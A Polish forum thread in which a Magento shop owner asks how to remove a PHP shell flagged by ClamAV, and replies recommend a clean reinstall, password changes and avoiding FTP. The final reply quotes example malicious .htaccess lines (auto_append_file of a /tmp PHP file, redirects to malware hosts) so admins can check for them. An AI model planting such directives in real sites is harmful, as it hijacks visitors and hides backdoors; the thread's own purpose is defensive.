Infekcja sklepu Magento wirusem PHP.Shell-42

Czy macie jakieś pomysły, skuteczne sposoby aby pozbyć się tego dziadostwa bez kasowania i ponownego wgrywania aplikacji sklepu Magento?

/home/{name}/domains/{domainname}/public_html/get.php: PHP.Shell-42 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 3769761
Engine version: 0.98.5
Scanned directories: 14232
Scanned files: 57664
Infected files: 1
Data scanned: 4572.68 MB
Data read: 7769.84 MB (ratio 0.59:1)
Time: 387.148 sec (6 m 27 s)

Będę bardzo wdzięczny.

Wirus przy tylu plikach oznacza na pewno jakiegoś backdoora, zakodowanego dodatkowo base64 lub zaszytego w inny sposób.
Przebiabiałem to kiedys i niestety powtórzę słowa admina: "prędzej czy później i tak Pan bedzie musial wyczyscic wszystko i postawic od nowa".
Strasznie sie przed tym wzbranialem, bodaj z 3 miesiace i byl to najgorszy okres w dzialaniu witryny. Co chwile jakies bledy i blokady ze strony providera (spam) itd.
A i tak najlepsze na koniec: po jakims czasie sprawdzam cos w stronie postawionej na Joomla i moja uwage przykuł plik o dziwnej nazwie (dość dobrze znam strukturę plikow joomli). Odpalilem go z paska adresu i kopara mi opadla: ktos zostawil sobie backdoora w postaci napisanego w php totalcommandera! Mial dostep do wszystkich zasobow i mogl z nimi robic co chcial. Dobrze, ze moj server (hosting) robil za zoombie, a nie od razu wylecial w powietrze.
Tak wiec, nie ma rady. Czysta instalka cie czeka.

jw.

nie baw się w "leczenie" - i tak wróci

1. zacznij od skanowania wszystkich komputerów, przez które przewinęło się hasło do ftp - jeżeli są zainfekowane to nawet po zmianie hasła i resecie serwera wszystko wróci
2. zmień hasło do ftp
3. dopiero teraz wyzeruj serwer (baza miejmy nadzieję jest ok i przy jej pomocy nie da się dokonać re-infekcji)
4. w miarę możliwości nie korzystaj z protokołu ftp - jest nieszyfrowany. w trakcie połączenia wszyscy po drodze widzą Twoje hasło

Ok tak właśnie myślałem, że restartu nie unikniemy ale wolałem zapytać mądrzejsze głowy.

Właśnie Nasz provider zablokował Nam aplikacje ze względu na próbę phishingu, ( rzekome przekierowanie na stronę firmy ubezpieczeniowej )

Czyli najlepiej łączyć się przez SSH? :)

Wydaje mi się, że winne mogą być również przestarzałe skrypty w magento.

Odyn napisał(a):

Wydaje mi się, że winne mogą być również przestarzałe skrypty w magento.

no raczej, chociaż nie ma reguły, widziałem kilka stron z przed kilku lat, które trzymają się dzielnie, a na niektóre nowe jakby się ktoś uwziął, czasami nawet użycie jakieś darmowej wtyczki, dodatku nakierowuje ataki na dana stronę no ale takie minusy otwartego skryptu

Jest też bardzo popularna i ciężko wykrywalna metoda infekcji w htaccess
np

php_value auto_append_file “/tmp/7674545454.php” 

Czasami malware pod Joomle, Wordpressa czy inne znane produkty wykorzystując ogólny zbiór exploitów robią takie przkierowania np do Exploit kitów albo zostawiają shell na httacess ?=[Shell]
albo tak

 
RewriteEngine On
ErrorDocument 404 http://strone.ru/injector/index.php
RewriteRule ^(.*)$ http://inject.com/malware.php [R=301,L]

Warto to ręcznie posprawdzać gdyż skanery, czasem nastawione są tylko na pliki PHP